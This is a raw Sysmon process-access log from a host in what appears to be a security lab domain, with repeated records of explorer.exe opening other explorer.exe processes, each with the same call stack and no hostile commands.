16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 